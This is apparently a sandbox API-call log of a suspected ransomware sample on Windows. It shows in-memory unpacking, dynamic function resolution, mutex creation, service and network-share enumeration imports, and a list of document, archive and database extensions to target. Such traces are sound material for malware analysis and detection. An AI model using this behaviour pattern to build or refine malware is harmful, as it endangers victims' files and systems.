	[0130.175] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.187] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.187] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.189] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.189] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.189] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.189] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.190] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.190] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0136.418] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x77080000
	[0136.418] GetProcAddress (hModule=0x77080000, lpProcName="GlobalAlloc") returned 0x7709588e
	[0136.486] GetProcAddress (hModule=0x77080000, lpProcName="VirtualProtect") returned 0x7709435f
	[0136.486] VirtualProtect (in: lpAddress=0x7b06ad0, dwSize=0x120fc, flNewProtect=0x40, lpflOldProtect=0x18edbc | out: lpflOldProtect=0x18edbc*=0x4) returned 1
	[0136.493] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77080000
	[0136.494] GetProcAddress (hModule=0x77080000, lpProcName="GlobalAlloc") returned 0x7709588e
	[0136.494] GetProcAddress (hModule=0x77080000, lpProcName="GetLastError") returned 0x770911c0
	[0136.494] GetProcAddress (hModule=0x77080000, lpProcName="Sleep") returned 0x770910ff
	[0136.494] GetProcAddress (hModule=0x77080000, lpProcName="VirtualAlloc") returned 0x77091856
	[0136.494] GetProcAddress (hModule=0x77080000, lpProcName="CreateToolhelp32Snapshot") returned 0x770b735f
	[0136.494] GetProcAddress (hModule=0x77080000, lpProcName="Module32First") returned 0x77115cd9
	[0136.494] GetProcAddress (hModule=0x77080000, lpProcName="CloseHandle") returned 0x77091410
	[0136.494] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x58
	[0136.496] Module32First (hSnapshot=0x58, lpme=0x18fb70) returned 1
	[0136.497] VirtualAlloc (lpAddress=0x0, dwSize=0x18050, flAllocationType=0x1000, flProtect=0x40) returned 0x210000
	[0136.500] GetProcAddress (hModule=0x77080000, lpProcName="LoadLibraryA") returned 0x770949d7
	[0136.500] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77080000
	[0136.500] GetProcAddress (hModule=0x77080000, lpProcName="VirtualAlloc") returned 0x77091856
	[0136.500] GetProcAddress (hModule=0x77080000, lpProcName="VirtualProtect") returned 0x7709435f
	[0136.500] GetProcAddress (hModule=0x77080000, lpProcName="VirtualFree") returned 0x7709186e
	[0136.500] GetProcAddress (hModule=0x77080000, lpProcName="GetVersionExA") returned 0x77093519
	[0136.500] GetProcAddress (hModule=0x77080000, lpProcName="TerminateProcess") returned 0x770ad802
	[0136.500] GetProcAddress (hModule=0x77080000, lpProcName="ExitProcess") returned 0x77097a10
	[0136.500] GetProcAddress (hModule=0x77080000, lpProcName="SetErrorMode") returned 0x77091b00
	[0136.500] SetErrorMode (uMode=0x400) returned 0x0
	[0136.500] SetErrorMode (uMode=0x0) returned 0x400
	[0136.500] GetVersionExA (in: lpVersionInformation=0x18eaa0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}\\w") | out: lpVersionInformation=0x18eaa0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0136.500] VirtualAlloc (lpAddress=0x0, dwSize=0x17200, flAllocationType=0x1000, flProtect=0x4) returned 0x230000
	[0136.502] VirtualProtect (in: lpAddress=0x400000, dwSize=0x19000, flNewProtect=0x40, lpflOldProtect=0x18fb28 | out: lpflOldProtect=0x18fb28*=0x2) returned 1
	[0136.556] VirtualFree (lpAddress=0x230000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0136.556] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x77080000
	[0136.556] GetProcAddress (hModule=0x77080000, lpProcName="GetProcAddress") returned 0x77091222
	[0136.556] GetProcAddress (hModule=0x77080000, lpProcName="LoadLibraryA") returned 0x770949d7
	[0136.556] GetProcAddress (hModule=0x77080000, lpProcName="WaitForSingleObject") returned 0x77091136
	[0136.557] GetProcAddress (hModule=0x77080000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x77091916
	[0136.557] GetProcAddress (hModule=0x77080000, lpProcName="LeaveCriticalSection") returned 0x775b2270
	[0136.557] GetProcAddress (hModule=0x77080000, lpProcName="GetLastError") returned 0x770911c0
	[0136.557] GetProcAddress (hModule=0x77080000, lpProcName="EnterCriticalSection") returned 0x775b22b0
	[0136.557] GetProcAddress (hModule=0x77080000, lpProcName="ReleaseMutex") returned 0x7709111e
	[0136.557] GetProcAddress (hModule=0x77080000, lpProcName="CloseHandle") returned 0x77091410
	[0136.557] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x74f20000
	[0136.576] GetProcAddress (hModule=0x74f20000, lpProcName="atexit") returned 0x74f3c544
	[0136.576] atexit (param_1=0x210920) returned 0
	[0136.576] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77080000
	[0136.576] GetProcAddress (hModule=0x77080000, lpProcName="GetProcAddress") returned 0x77091222
	[0136.576] GetProcAddress (hModule=0x77080000, lpProcName="GetModuleHandleW") returned 0x770934b0
	[0136.576] GetProcAddress (hModule=0x77080000, lpProcName="FindNextFileW") returned 0x770954ee
	[0136.576] GetProcAddress (hModule=0x77080000, lpProcName="FindClose") returned 0x77094442
	[0136.576] GetProcAddress (hModule=0x77080000, lpProcName="MoveFileW") returned 0x770a9af0
	[0136.577] GetProcAddress (hModule=0x77080000, lpProcName="GetFileSizeEx") returned 0x770959e2
	[0136.577] GetProcAddress (hModule=0x77080000, lpProcName="GetModuleFileNameW") returned 0x77094950
	[0136.577] GetProcAddress (hModule=0x77080000, lpProcName="GetFileAttributesW") returned 0x77091b18
	[0136.577] GetProcAddress (hModule=0x77080000, lpProcName="ExitProcess") returned 0x77097a10
	[0136.577] GetProcAddress (hModule=0x77080000, lpProcName="GetCommandLineW") returned 0x77095223
	[0136.577] GetProcAddress (hModule=0x77080000, lpProcName="GetComputerNameW") returned 0x7709dd0e
	[0136.577] GetProcAddress (hModule=0x77080000, lpProcName="GetComputerNameA") returned 0x770ab6e0
	[0136.577] GetProcAddress (hModule=0x77080000, lpProcName="CreateMutexW") returned 0x7709424c
	[0136.577] GetProcAddress (hModule=0x77080000, lpProcName="lstrlenW") returned 0x77091700
	[0136.577] GetProcAddress (hModule=0x77080000, lpProcName="lstrlenA") returned 0x77095a4b
	[0136.577] GetProcAddress (hModule=0x77080000, lpProcName="GetCurrentProcess") returned 0x77091809
	[0136.577] GetProcAddress (hModule=0x77080000, lpProcName="WaitForSingleObject") returned 0x77091136
	[0136.577] GetProcAddress (hModule=0x77080000, lpProcName="GetLogicalDrives") returned 0x77095371
	[0136.577] GetProcAddress (hModule=0x77080000, lpProcName="GetTickCount") returned 0x7709110c
	[0136.578] GetProcAddress (hModule=0x77080000, lpProcName="DeleteFileW") returned 0x770989b3
	[0136.578] GetProcAddress (hModule=0x77080000, lpProcName="WideCharToMultiByte") returned 0x7709170d
	[0136.578] GetProcAddress (hModule=0x77080000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x77091916
	[0136.578] GetProcAddress (hModule=0x77080000, lpProcName="Sleep") returned 0x770910ff
	[0136.578] GetProcAddress (hModule=0x77080000, lpProcName="LeaveCriticalSection") returned 0x775b2270
	[0136.578] GetProcAddress (hModule=0x77080000, lpProcName="ReadFile") returned 0x77093ed3
	[0136.578] GetProcAddress (hModule=0x77080000, lpProcName="CreateFileW") returned 0x77093f5c
	[0136.578] GetProcAddress (hModule=0x77080000, lpProcName="OpenMutexW") returned 0x77095151
	[0136.578] GetProcAddress (hModule=0x77080000, lpProcName="EnterCriticalSection") returned 0x775b22b0
	[0136.578] GetProcAddress (hModule=0x77080000, lpProcName="WaitForMultipleObjects") returned 0x77094220
	[0136.578] GetProcAddress (hModule=0x77080000, lpProcName="lstrcmpiW") returned 0x770ad5cd
	[0136.578] GetProcAddress (hModule=0x77080000, lpProcName="lstrcmpiA") returned 0x77093e8e
	[0136.578] GetProcAddress (hModule=0x77080000, lpProcName="DeleteCriticalSection") returned 0x775c45f5
	[0136.578] GetProcAddress (hModule=0x77080000, lpProcName="ReleaseMutex") returned 0x7709111e
	[0136.578] GetProcAddress (hModule=0x77080000, lpProcName="CloseHandle") returned 0x77091410
	[0136.578] GetProcAddress (hModule=0x77080000, lpProcName="GetVersion") returned 0x77094467
	[0136.579] GetProcAddress (hModule=0x77080000, lpProcName="CreateThread") returned 0x770934d5
	[0136.579] GetProcAddress (hModule=0x77080000, lpProcName="ExpandEnvironmentStringsW") returned 0x77094173
	[0136.579] GetProcAddress (hModule=0x77080000, lpProcName="QueryPerformanceCounter") returned 0x77091725
	[0136.579] GetProcAddress (hModule=0x77080000, lpProcName="QueryPerformanceFrequency") returned 0x770941f0
	[0136.579] GetProcAddress (hModule=0x77080000, lpProcName="GetCurrentProcessId") returned 0x770911f8
	[0136.579] GetProcAddress (hModule=0x77080000, lpProcName="SetFileAttributesW") returned 0x770ad4f7
	[0136.579] GetProcAddress (hModule=0x77080000, lpProcName="GetVolumeInformationW") returned 0x770ac860
	[0136.579] GetProcAddress (hModule=0x77080000, lpProcName="WriteFile") returned 0x77091282
	[0136.579] GetProcAddress (hModule=0x77080000, lpProcName="SetFilePointerEx") returned 0x770ac807
	[0136.579] GetProcAddress (hModule=0x77080000, lpProcName="SetEndOfFile") returned 0x770ace2e
	[0136.579] GetProcAddress (hModule=0x77080000, lpProcName="FindFirstFileW") returned 0x77094435
	[0136.579] GetProcAddress (hModule=0x77080000, lpProcName="GetProcessHeap") returned 0x770914e9
	[0136.579] GetProcAddress (hModule=0x77080000, lpProcName="HeapReAlloc") returned 0x775d1f6e
	[0136.579] GetProcAddress (hModule=0x77080000, lpProcName="HeapAlloc") returned 0x775be026
	[0136.579] GetProcAddress (hModule=0x77080000, lpProcName="HeapFree") returned 0x770914c9
	[0136.580] GetProcAddress (hModule=0x77080000, lpProcName="CreatePipe") returned 0x7711415b
	[0136.580] GetProcAddress (hModule=0x77080000, lpProcName="SetHandleInformation") returned 0x770a195c
	[0136.580] GetProcAddress (hModule=0x77080000, lpProcName="CreateProcessW") returned 0x7709103d
	[0136.580] GetProcAddress (hModule=0x77080000, lpProcName="CompareStringW") returned 0x77093bca
	[0136.580] GetProcAddress (hModule=0x77080000, lpProcName="CompareStringA") returned 0x77093c5a
	[0136.580] GetProcAddress (hModule=0x77080000, lpProcName="OpenProcess") returned 0x77091986
	[0136.580] GetProcAddress (hModule=0x77080000, lpProcName="TerminateProcess") returned 0x770ad802
	[0136.580] GetProcAddress (hModule=0x77080000, lpProcName="GetSystemTime") returned 0x77095a96
	[0136.580] GetProcAddress (hModule=0x77080000, lpProcName="SystemTimeToFileTime") returned 0x77095a7e
	[0136.580] GetProcAddress (hModule=0x77080000, lpProcName="GetLastError") returned 0x770911c0
	[0136.580] GetProcAddress (hModule=0x77080000, lpProcName="CreateToolhelp32Snapshot") returned 0x770b735f
	[0136.580] GetProcAddress (hModule=0x77080000, lpProcName="Process32NextW") returned 0x770b896c
	[0136.580] GetProcAddress (hModule=0x77080000, lpProcName="Process32FirstW") returned 0x770b8baf
	[0136.580] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x75a00000
	[0136.580] GetProcAddress (hModule=0x75a00000, lpProcName="RegOpenKeyExW") returned 0x75a1468d
	[0136.580] GetProcAddress (hModule=0x75a00000, lpProcName="RegQueryValueExW") returned 0x75a146ad
	[0136.581] GetProcAddress (hModule=0x75a00000, lpProcName="RegSetValueExW") returned 0x75a114d6
	[0136.581] GetProcAddress (hModule=0x75a00000, lpProcName="RegCloseKey") returned 0x75a1469d
	[0136.581] GetProcAddress (hModule=0x75a00000, lpProcName="OpenProcessToken") returned 0x75a14304
	[0136.581] GetProcAddress (hModule=0x75a00000, lpProcName="GetTokenInformation") returned 0x75a1431c
	[0136.581] GetProcAddress (hModule=0x75a00000, lpProcName="OpenSCManagerW") returned 0x75a0ca64
	[0136.581] GetProcAddress (hModule=0x75a00000, lpProcName="OpenServiceW") returned 0x75a0ca4c
	[0136.581] GetProcAddress (hModule=0x75a00000, lpProcName="CloseServiceHandle") returned 0x75a1369c
	[0136.581] GetProcAddress (hModule=0x75a00000, lpProcName="ControlService") returned 0x75a27144
	[0136.581] GetProcAddress (hModule=0x75a00000, lpProcName="QueryServiceStatus") returned 0x75a12a86
	[0136.581] GetProcAddress (hModule=0x75a00000, lpProcName="EnumDependentServicesW") returned 0x75a01e3a
	[0136.581] GetProcAddress (hModule=0x75a00000, lpProcName="EnumServicesStatusExW") returned 0x75a0b466
	[0136.581] LoadLibraryA (lpLibFileName="user32.dll") returned 0x75760000
	[0136.581] GetProcAddress (hModule=0x75760000, lpProcName="SystemParametersInfoW") returned 0x757790d3
	[0136.581] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x760c0000
	[0136.599] GetProcAddress (hModule=0x760c0000, lpProcName="ShellExecuteExW") returned 0x760e1e46
	[0136.599] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77590000
	[0136.599] GetProcAddress (hModule=0x77590000, lpProcName="NtQuerySystemInformation") returned 0x775afda0
	[0136.599] LoadLibraryA (lpLibFileName="mpr.dll") returned 0x74f00000
	[0136.606] GetProcAddress (hModule=0x74f00000, lpProcName="WNetCloseEnum") returned 0x74f02dd6
	[0136.606] GetProcAddress (hModule=0x74f00000, lpProcName="WNetOpenEnumW") returned 0x74f02f06
	[0136.606] GetProcAddress (hModule=0x74f00000, lpProcName="WNetEnumResourceW") returned 0x74f03058
	[0136.606] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x75290000
	[0136.638] GetProcAddress (hModule=0x75290000, lpProcName="WSAStartup") returned 0x75293ab2
	[0136.638] GetProcAddress (hModule=0x75290000, lpProcName="socket") returned 0x75293eb8
	[0136.638] GetProcAddress (hModule=0x75290000, lpProcName="send") returned 0x75296f01
	[0136.638] GetProcAddress (hModule=0x75290000, lpProcName="recv") returned 0x75296b0e
	[0136.638] GetProcAddress (hModule=0x75290000, lpProcName="connect") returned 0x75296bdd
	[0136.638] GetProcAddress (hModule=0x75290000, lpProcName="closesocket") returned 0x75293918
	[0136.638] GetProcAddress (hModule=0x75290000, lpProcName="gethostbyname") returned 0x752a7673
	[0136.638] GetProcAddress (hModule=0x75290000, lpProcName="inet_addr") returned 0x7529311b
	[0136.638] GetProcAddress (hModule=0x75290000, lpProcName="ntohl") returned 0x75292d57
	[0136.638] GetProcAddress (hModule=0x75290000, lpProcName="htonl") returned 0x75292d57
	[0136.638] GetProcAddress (hModule=0x75290000, lpProcName="htons") returned 0x75292d8b
	[0136.638] GetProcessHeap () returned 0x7ab0000
	[0136.638] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x20) returned 0x7b1faa0
	[0136.638] QueryPerformanceCounter (in: lpPerformanceCount=0x18f978 | out: lpPerformanceCount=0x18f978*=8189922220) returned 1
	[0136.638] GetTickCount () returned 0x1133d9d
	[0136.638] GetCurrentProcessId () returned 0x5e0
	[0136.639] GetTickCount () returned 0x1133d9d
	[0136.639] GetTickCount () returned 0x1133d9d
	[0136.639] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x20) returned 0x7b1fac8
	[0136.639] GetVersion () returned 0x1db10106
	[0136.639] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x7) returned 0x7ac40c8
	[0136.639] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7ac0f00
	[0136.639] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7ac0f00, Size=0x20) returned 0x7b1fb18
	[0136.639] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1fb18, Size=0x40) returned 0x7b20180
	[0136.639] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xfffe) returned 0x7b21120
	[0136.639] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_URN0LVA") returned 0x0
	[0136.639] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_URN0LVA") returned 0x88
	[0136.639] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7ac40c8 | out: hHeap=0x7ab0000) returned 1
	[0136.640] lstrlenW (lpString="Global\\syncronize_") returned 18
	[0136.640] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b20180 | out: hHeap=0x7ab0000) returned 1
	[0136.640] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x7) returned 0x7ac40c8
	[0136.640] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7ac0f00
	[0136.640] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7ac0f00, Size=0x20) returned 0x7b1fb18
	[0136.640] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1fb18, Size=0x40) returned 0x7b20180
	[0136.640] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xfffe) returned 0x7b31128
	[0136.640] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\syncronize_URN0LVU") returned 0x0
	[0136.640] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\syncronize_URN0LVU") returned 0x8c
	[0136.640] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7ac40c8 | out: hHeap=0x7ab0000) returned 1
	[0136.640] lstrlenW (lpString="Global\\syncronize_") returned 18
	[0136.640] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b20180 | out: hHeap=0x7ab0000) returned 1
	[0136.640] GetVersion () returned 0x1db10106
	[0136.640] GetCurrentProcess () returned 0xffffffff
	[0136.640] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18f964 | out: TokenHandle=0x18f964*=0x90) returned 1
	[0136.640] GetTokenInformation (in: TokenHandle=0x90, TokenInformationClass=0x14, TokenInformation=0x18f960, TokenInformationLength=0x4, ReturnLength=0x18f96c | out: TokenInformation=0x18f960, ReturnLength=0x18f96c) returned 1
	[0136.640] CloseHandle (hObject=0x90) returned 1
	[0136.640] WaitForSingleObject (hHandle=0x8c, dwMilliseconds=0x0) returned 0x0
	[0136.640] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x14) returned 0x7ac40c8
	[0136.640] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7ac0f00
	[0136.640] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7ac0f00, Size=0x20) returned 0x7b1fb18
	[0136.640] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1fb18, Size=0x40) returned 0x7b20180
	[0136.640] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b20180, Size=0x80) returned 0x7b1f628
	[0136.640] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f628, Size=0x100) returned 0x7b1f628
	[0136.641] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x34) returned 0x7b1f730
	[0136.641] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x4) returned 0x7b1f770
	[0136.641] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x4) returned 0x7b1f780
	[0136.641] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x8) returned 0x7b1f790
	[0136.641] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7ac0f00
	[0136.641] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x4) returned 0x7b1f7a0
	[0136.641] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7ac0f18
	[0136.641] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f7a0, Size=0x8) returned 0x7b1f7a0
	[0136.641] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7ac0f30
	[0136.641] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f7a0, Size=0x10) returned 0x7b1f7a0
	[0136.641] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7ac0f48
	[0136.641] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7ac0f60
	[0136.641] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f7a0, Size=0x20) returned 0x7b1f7a0
	[0136.641] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b41148
	[0136.641] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b41160
	[0136.641] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f770, Size=0x8) returned 0x7b1f770
	[0136.641] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f780, Size=0x8) returned 0x7b1f780
	[0136.641] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x8) returned 0x7b1f7c8
	[0136.641] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b41178
	[0136.641] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x4) returned 0x7b1f7d8
	[0136.641] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b41190
	[0136.641] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f7d8, Size=0x8) returned 0x7b1f7d8
	[0136.641] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b411a8
	[0136.641] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f7d8, Size=0x10) returned 0x7b1f7d8
	[0136.641] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b411c0
	[0136.641] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x8) returned 0x7b1f7f0
	[0136.641] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f7d8, Size=0x20) returned 0x7b1f800
	[0136.641] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f770, Size=0x10) returned 0x7b1f7d8
	[0136.641] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f780, Size=0x10) returned 0x7b1f828
	[0136.641] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x8) returned 0x7b1f770
	[0136.641] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b411d8
	[0136.641] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x4) returned 0x7b1f780
	[0136.641] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b411f0
	[0136.641] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f780, Size=0x8) returned 0x7b1f780
	[0136.641] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x8) returned 0x7b1f840
	[0136.641] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b41208
	[0136.641] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x4) returned 0x7b1f850
	[0136.641] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b41220
	[0136.641] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f850, Size=0x8) returned 0x7b1f850
	[0136.641] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f7d8, Size=0x20) returned 0x7b1f860
	[0136.642] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f828, Size=0x20) returned 0x7b1f888
	[0136.642] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x8) returned 0x7b1f828
	[0136.642] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b41238
	[0136.642] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x4) returned 0x7b1f7d8
	[0136.642] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xa) returned 0x7b41250
	[0136.642] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f7d8, Size=0x8) returned 0x7b1f7d8
	[0136.642] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x14) returned 0x7b1f8b0
	[0136.642] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x14) returned 0x7b41530
	[0136.642] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91
	[0136.642] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7b1f628 | out: hHeap=0x7ab0000) returned 1
	[0136.642] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x18f9b0 | out: lpWSAData=0x18f9b0) returned 0
	[0136.650] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b41268
	[0136.650] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b41268, Size=0x20) returned 0x7b1fd20
	[0136.650] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1fd20, Size=0x40) returned 0x7b20180
	[0136.650] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b20180, Size=0x80) returned 0x7b1f680
	[0136.650] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f680, Size=0x100) returned 0x7b41808
	[0136.650] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b41268
	[0136.650] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b41268, Size=0x20) returned 0x7b1fd20
	[0136.650] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1fd20, Size=0x40) returned 0x7b20180
	[0136.650] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b20180, Size=0x80) returned 0x7b1f680
	[0136.650] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f680, Size=0x100) returned 0x7b41910
	[0136.650] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc) returned 0x7b41268
	[0136.650] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x4) returned 0x7b1f8d0
	[0136.650] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10) returned 0x7b41280
	[0136.650] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f8d0, Size=0x8) returned 0x7b1f8d0
	[0136.650] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x14) returned 0x7b1f680
	[0136.650] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0x7b1f8d0, Size=0x10) returned 0x7b1f6a0
	[0136.650] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x18) returned 0x7b1f6b8
	[0136.650] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x1a) returned 0x7b1fd20
